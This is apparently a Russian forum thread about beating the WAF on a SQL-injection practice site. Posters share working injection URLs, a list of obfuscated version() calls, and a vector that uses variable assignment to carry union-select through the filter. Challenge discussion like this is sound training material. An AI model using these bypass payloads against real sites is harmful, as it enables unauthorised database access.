Доброго времени суток. Может,кто подскажет как пробросить в первом задание version(). Синонемы функции блочит.(left,right and etc) Различные комбинации с обфусикацие тоже. Через Hex лишь в таблицу добавляет заhex-ое слово. Ы.З В каком направление капать. Во втором задание все прекрасно проходит. Ы.Ы.З Может и туплю, но хотелось бы получить хинт.
так и чего waf помучать)? раз уж репа все равно не выдаётся за таски Code: http://test.test-me.pp.ru/url1/inj_test.php?username=admin%27union+select+1,2,3,version/**/()%23
WAF всеравно это фильтрует.Таким образом с самого начала пытался(кроме %23).Что бы прокинуть саму скуль для первого задания пришлось юзать такую конструкцию: Code: http://test.test-me.pp.ru/url1/inj_test.php?username=admin%27/*union*/union/*select*/select%201,2,3,4%20--%20 Не знаю, может проблема у меня, но тестовая площадка порой введет себя странно. Запрос вашего ввида у меня вначале не проходил. Я не понимал в чем проблема, но WAF уже тогда блочил union,select и т.п.А через пару дней после уже использования своей конструкции, решил еще разок закинуть простой ввид, который не должен был пахать,он сработал, что удивило меня. Ы.З Вопрос все еще открыт. Версия так же не заходит. Ы.Ы.З В третьем и 4, по сути тоже должен быть один запрос с некоторой поравкой на xss, но сама скуля(без внедреняя еще xss),что пашет на 3, не пашет на 4. Ы.Ы.Ы.З полные ответы думаю стоит стереть после ответа на воп, иначе не будет интереса. Спасибо за отклик.
Всё равно моё мнение не надо вот так сливать таски. Хинтом помочь, да. А открыто постить решение лишает фана проходящих сие таски.
ой всё, первый вектор, первого таска кому интересно ещё валидные конструкции для селекта версии Code: select version/*!()*/; select version/*!(*//*!)*/; select version (); select version ( ); select version(/*hm*/); select version -> ( -> ); select @@version; select 0+version()+0; select{MySqL_d_bSeLect/*!version*//*!()*/}/*:D*/; select version()zzz; /*хмм*/ хехе кстати сейчас waf жестко валит запрос на слове version после словосочетаний union+select, кто раскрутит через union+select )? один рабочий вектор точно есть
Как раз вопрос в этом и был, как прокинуть version() в union+select. Само слово подчистую фильтрует, другие функции по типу left(), тоже не проходят(unhex,0x). Направление подкиньте.
хех ладно пусть чекают, валидный вектор Code: http://test.test-me.pp.ru/url1/inj_test.php?username=admin%27+and+@:=version()union+select@,2,3,""%23
Я думал, как только встречается символ/слово,etc WAF его чекает среди мусора, а вон оно как, просто безымянная переменная+: и он уже съел. И в селекте просто пробел убираем он прилепает, скулька хавает, а WAF не видит. Все больше вникая, в суть данного вида уязвимости, приходишь к выводу,что это защита от протечки с помощью сита. За ответ спс. Попробую развить данную мысль.
ну waf вынужденная мера, а сито ситу рознь) просто там регекс видимо такой union.*select.*(@|version) собственно да пробел перед переменной и селектором не обязателен, хм ищу альтернативу, пофиксят скоро наверно)
